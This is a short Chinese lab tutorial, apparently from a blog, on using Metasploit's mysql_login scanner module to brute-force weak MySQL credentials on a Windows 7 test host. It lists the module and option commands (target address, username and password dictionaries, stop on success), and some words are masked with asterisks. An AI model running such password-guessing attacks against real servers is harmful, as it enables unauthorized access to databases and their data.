msf-mysql弱口令**
实验环境:
攻击机:kali
被攻击方:windows 7 (phpstudy上的mysql服务)
前提是对方必须开启mysql远程登陆服务,开启了3306端口
如何启动mysql远程登陆,可参考这篇文章
https://blog.csdn.net/qq_45089570/article/details/104569254
开始攻击
- use auxiliary/scanner/mysql/mysql_login
- 查看此模块的选项:show options
- 设置
set RHOST 192.168.11.101 (这是我windows7 的ip地址)
set user_file 用户名字典的路径(位置)
set pass_file 密码字典的路径(位置)
set STOP_ON_SUCCESS yes (只要**成功就停止)
run 启动攻击,开始**